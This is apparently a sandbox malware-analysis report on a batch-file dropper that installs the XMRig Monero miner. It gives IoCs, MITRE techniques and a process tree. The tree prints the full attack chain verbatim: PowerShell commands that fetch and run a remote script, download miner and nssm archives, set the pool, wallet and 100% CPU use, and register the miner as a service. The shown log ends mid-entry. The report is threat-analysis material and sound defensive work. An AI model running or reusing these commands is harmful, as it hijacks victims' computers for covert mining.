xmrig | 4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

Analysis

max time kernel
1049s
max time network
1051s
platform
windows11-21h2_x64
resource
win11-20240611-en
resource tags

arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
submitted
01/07/2024, 04:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

106551798520681.bat
Size

517B
MD5

ac9d73455d58bfa42f81e718b8c8d6b5
SHA1

60040fff333b7bc09b22e5c013f11b8a99555ed3
SHA256

4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12
SHA512

ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://rentry.co/regele/raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral3/files/0x000100000002aa4d-60.dat	family_xmrig
behavioral3/files/0x000100000002aa4d-60.dat	xmrig
behavioral3/memory/2500-63-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-189-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-190-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-191-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-192-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-193-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-194-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-195-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-196-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-197-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-198-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-199-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-200-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-201-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-202-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-203-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-204-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-205-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-206-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-207-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-208-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-209-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-210-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-211-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-212-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-213-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-214-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-215-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-216-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-217-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-218-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-219-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-220-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-221-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-222-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-223-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-225-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-226-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-227-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-228-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-229-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-230-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-231-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-232-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-233-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-234-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-235-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-236-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-237-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-238-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-239-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-240-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-241-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-242-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-243-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-244-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-245-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-246-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-247-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-248-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-249-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral3/memory/2192-250-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	2444	powershell.exe
4	3532	powershell.exe
5	3268	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
2500	xmrig.exe
4268	nssm.exe
3144	nssm.exe
3528	nssm.exe
2644	nssm.exe
1048	nssm.exe
3556	nssm.exe
1148	nssm.exe
2192	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
1	raw.githubusercontent.com
4	raw.githubusercontent.com
5	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
724	sc.exe
4984	sc.exe
3620	sc.exe
1744	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2712	powershell.exe
3268	powershell.exe
5076	powershell.exe
3532	powershell.exe
1636	powershell.exe
4372	powershell.exe
1960	powershell.exe
2444	powershell.exe
5056	powershell.exe
1812	powershell.exe
4128	powershell.exe
1084	powershell.exe
1516	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
2500	timeout.exe
2372	timeout.exe
2676	timeout.exe
1108	Process not Found
4640	Process not Found
724	timeout.exe
2136	timeout.exe
3620	timeout.exe
2692	timeout.exe
3828	timeout.exe
2900	timeout.exe
3156	timeout.exe
4244	timeout.exe
4372	Process not Found
2536	Process not Found
924	Process not Found
1740	timeout.exe
708	timeout.exe
872	timeout.exe
2960	Process not Found
4100	timeout.exe
2648	Process not Found
3052	timeout.exe
1576	timeout.exe
1340	timeout.exe
2300	timeout.exe
1840	Process not Found
5112	Process not Found
1764	timeout.exe
3880	timeout.exe
1888	timeout.exe
3100	timeout.exe
1668	timeout.exe
1592	timeout.exe
1564	timeout.exe
1624	timeout.exe
3100	Process not Found
3844	Process not Found
3900	timeout.exe
3860	timeout.exe
1056	timeout.exe
1572	Process not Found
4224	Process not Found
2392	timeout.exe
1888	timeout.exe
4312	Process not Found
4660	timeout.exe
4860	timeout.exe
3032	timeout.exe
1504	timeout.exe
1540	timeout.exe
804	Process not Found
3612	timeout.exe
2188	timeout.exe
1012	timeout.exe
1404	timeout.exe
5100	timeout.exe
2116	Process not Found
688	Process not Found
1856	Process not Found
1088	Process not Found
4044	timeout.exe
1500	timeout.exe
1920	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2688	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
2444	powershell.exe
2444	powershell.exe
3532	powershell.exe
3532	powershell.exe
1636	powershell.exe
1636	powershell.exe
2712	powershell.exe
2712	powershell.exe
4128	powershell.exe
4128	powershell.exe
4372	powershell.exe
4372	powershell.exe
5056	powershell.exe
5056	powershell.exe
1960	powershell.exe
1960	powershell.exe
1084	powershell.exe
1084	powershell.exe
1812	powershell.exe
1812	powershell.exe
1516	powershell.exe
1516	powershell.exe
3268	powershell.exe
3268	powershell.exe
5076	powershell.exe
5076	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2444	powershell.exe
Token: SeDebugPrivilege	2688	taskkill.exe
Token: SeDebugPrivilege	3532	powershell.exe
Token: SeDebugPrivilege	1636	powershell.exe
Token: SeDebugPrivilege	2712	powershell.exe
Token: SeDebugPrivilege	4128	powershell.exe
Token: SeDebugPrivilege	4372	powershell.exe
Token: SeDebugPrivilege	5056	powershell.exe
Token: SeDebugPrivilege	1960	powershell.exe
Token: SeDebugPrivilege	1084	powershell.exe
Token: SeDebugPrivilege	1812	powershell.exe
Token: SeDebugPrivilege	1516	powershell.exe
Token: SeDebugPrivilege	3268	powershell.exe
Token: SeDebugPrivilege	5076	powershell.exe
Token: SeLockMemoryPrivilege	2192	xmrig.exe
Token: SeIncreaseQuotaPrivilege	4488	WMIC.exe
Token: SeSecurityPrivilege	4488	WMIC.exe
Token: SeTakeOwnershipPrivilege	4488	WMIC.exe
Token: SeLoadDriverPrivilege	4488	WMIC.exe
Token: SeSystemProfilePrivilege	4488	WMIC.exe
Token: SeSystemtimePrivilege	4488	WMIC.exe
Token: SeProfSingleProcessPrivilege	4488	WMIC.exe
Token: SeIncBasePriorityPrivilege	4488	WMIC.exe
Token: SeCreatePagefilePrivilege	4488	WMIC.exe
Token: SeBackupPrivilege	4488	WMIC.exe
Token: SeRestorePrivilege	4488	WMIC.exe
Token: SeShutdownPrivilege	4488	WMIC.exe
Token: SeDebugPrivilege	4488	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4488	WMIC.exe
Token: SeRemoteShutdownPrivilege	4488	WMIC.exe
Token: SeUndockPrivilege	4488	WMIC.exe
Token: SeManageVolumePrivilege	4488	WMIC.exe
Token: 33	4488	WMIC.exe
Token: 34	4488	WMIC.exe
Token: 35	4488	WMIC.exe
Token: 36	4488	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4488	WMIC.exe
Token: SeSecurityPrivilege	4488	WMIC.exe
Token: SeTakeOwnershipPrivilege	4488	WMIC.exe
Token: SeLoadDriverPrivilege	4488	WMIC.exe
Token: SeSystemProfilePrivilege	4488	WMIC.exe
Token: SeSystemtimePrivilege	4488	WMIC.exe
Token: SeProfSingleProcessPrivilege	4488	WMIC.exe
Token: SeIncBasePriorityPrivilege	4488	WMIC.exe
Token: SeCreatePagefilePrivilege	4488	WMIC.exe
Token: SeBackupPrivilege	4488	WMIC.exe
Token: SeRestorePrivilege	4488	WMIC.exe
Token: SeShutdownPrivilege	4488	WMIC.exe
Token: SeDebugPrivilege	4488	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4488	WMIC.exe
Token: SeRemoteShutdownPrivilege	4488	WMIC.exe
Token: SeUndockPrivilege	4488	WMIC.exe
Token: SeManageVolumePrivilege	4488	WMIC.exe
Token: 33	4488	WMIC.exe
Token: 34	4488	WMIC.exe
Token: 35	4488	WMIC.exe
Token: 36	4488	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4248	WMIC.exe
Token: SeSecurityPrivilege	4248	WMIC.exe
Token: SeTakeOwnershipPrivilege	4248	WMIC.exe
Token: SeLoadDriverPrivilege	4248	WMIC.exe
Token: SeSystemProfilePrivilege	4248	WMIC.exe
Token: SeSystemtimePrivilege	4248	WMIC.exe
Token: SeProfSingleProcessPrivilege	4248	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2192	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2868 wrote to memory of 2444	2868	cmd.exe	81
PID 2868 wrote to memory of 2444	2868	cmd.exe	81
PID 2444 wrote to memory of 4160	2444	powershell.exe	82
PID 2444 wrote to memory of 4160	2444	powershell.exe	82
PID 4160 wrote to memory of 3008	4160	cmd.exe	84
PID 4160 wrote to memory of 3008	4160	cmd.exe	84
PID 3008 wrote to memory of 1484	3008	net.exe	85
PID 3008 wrote to memory of 1484	3008	net.exe	85
PID 4160 wrote to memory of 1860	4160	cmd.exe	86
PID 4160 wrote to memory of 1860	4160	cmd.exe	86
PID 4160 wrote to memory of 4860	4160	cmd.exe	87
PID 4160 wrote to memory of 4860	4160	cmd.exe	87
PID 4160 wrote to memory of 936	4160	cmd.exe	88
PID 4160 wrote to memory of 936	4160	cmd.exe	88
PID 4160 wrote to memory of 3152	4160	cmd.exe	89
PID 4160 wrote to memory of 3152	4160	cmd.exe	89
PID 4160 wrote to memory of 4188	4160	cmd.exe	90
PID 4160 wrote to memory of 4188	4160	cmd.exe	90
PID 4160 wrote to memory of 724	4160	cmd.exe	91
PID 4160 wrote to memory of 724	4160	cmd.exe	91
PID 4160 wrote to memory of 4984	4160	cmd.exe	92
PID 4160 wrote to memory of 4984	4160	cmd.exe	92
PID 4160 wrote to memory of 2688	4160	cmd.exe	93
PID 4160 wrote to memory of 2688	4160	cmd.exe	93
PID 4160 wrote to memory of 3532	4160	cmd.exe	95
PID 4160 wrote to memory of 3532	4160	cmd.exe	95
PID 4160 wrote to memory of 1636	4160	cmd.exe	96
PID 4160 wrote to memory of 1636	4160	cmd.exe	96
PID 4160 wrote to memory of 2712	4160	cmd.exe	97
PID 4160 wrote to memory of 2712	4160	cmd.exe	97
PID 4160 wrote to memory of 2500	4160	cmd.exe	98
PID 4160 wrote to memory of 2500	4160	cmd.exe	98
PID 4160 wrote to memory of 2140	4160	cmd.exe	99
PID 4160 wrote to memory of 2140	4160	cmd.exe	99
PID 2140 wrote to memory of 4128	2140	cmd.exe	100
PID 2140 wrote to memory of 4128	2140	cmd.exe	100
PID 4128 wrote to memory of 5036	4128	powershell.exe	124
PID 4128 wrote to memory of 5036	4128	powershell.exe	124
PID 4160 wrote to memory of 4372	4160	cmd.exe	272
PID 4160 wrote to memory of 4372	4160	cmd.exe	272
PID 4160 wrote to memory of 5056	4160	cmd.exe	275
PID 4160 wrote to memory of 5056	4160	cmd.exe	275
PID 4160 wrote to memory of 1960	4160	cmd.exe	104
PID 4160 wrote to memory of 1960	4160	cmd.exe	104
PID 4160 wrote to memory of 1084	4160	cmd.exe	105
PID 4160 wrote to memory of 1084	4160	cmd.exe	105
PID 4160 wrote to memory of 1812	4160	cmd.exe	155
PID 4160 wrote to memory of 1812	4160	cmd.exe	155
PID 4160 wrote to memory of 1516	4160	cmd.exe	161
PID 4160 wrote to memory of 1516	4160	cmd.exe	161
PID 4160 wrote to memory of 3268	4160	cmd.exe	108
PID 4160 wrote to memory of 3268	4160	cmd.exe	108
PID 4160 wrote to memory of 5076	4160	cmd.exe	109
PID 4160 wrote to memory of 5076	4160	cmd.exe	109
PID 4160 wrote to memory of 3620	4160	cmd.exe	457
PID 4160 wrote to memory of 3620	4160	cmd.exe	457
PID 4160 wrote to memory of 1744	4160	cmd.exe	173
PID 4160 wrote to memory of 1744	4160	cmd.exe	173
PID 4160 wrote to memory of 4268	4160	cmd.exe	462
PID 4160 wrote to memory of 4268	4160	cmd.exe	462
PID 4160 wrote to memory of 3144	4160	cmd.exe	113
PID 4160 wrote to memory of 3144	4160	cmd.exe	113
PID 4160 wrote to memory of 3528	4160	cmd.exe	114
PID 4160 wrote to memory of 3528	4160	cmd.exe	114

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\106551798520681.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp82AD.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4160
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3008
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:1484
  - - C:\Windows\system32\where.exe
      where powershell
      4⤵
      PID:1860
  - - C:\Windows\system32\where.exe
      where find
      4⤵
      PID:4860
  - - C:\Windows\system32\where.exe
      where findstr
      4⤵
      PID:936
  - - C:\Windows\system32\where.exe
      where tasklist
      4⤵
      PID:3152
  - - C:\Windows\system32\where.exe
      where sc
      4⤵
      PID:4188
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:724
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:4984
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im xmrig.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2688
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3532
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1636
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2712
  - - C:\Users\Admin\moneroocean\xmrig.exe
      "C:\Users\Admin\moneroocean\xmrig.exe" --help
      4⤵
      Executes dropped EXE
      PID:2500
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2140
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4128
      - C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        6⤵
        
        PID:5036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4372
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5056
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Uggbvqgb\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1960
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1084
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1812
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1516
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3268
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5076
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:3620
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:1744
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
      4⤵
      Executes dropped EXE
      PID:4268
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
      4⤵
      Executes dropped EXE
      PID:3144
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
      4⤵
      Executes dropped EXE
      PID:3528
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
      4⤵
      Executes dropped EXE
      PID:2644
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
      4⤵
      Executes dropped EXE
      PID:1048
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
      4⤵
      Executes dropped EXE
      PID:3556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3472
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4488
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2620
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4248
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2004
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:896
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1768
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1188
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2436
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2676
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1752
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3628
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3932
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2604
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:72
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3960
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1920
- - C:\Windows\System32\Wbem\WMIC.exe
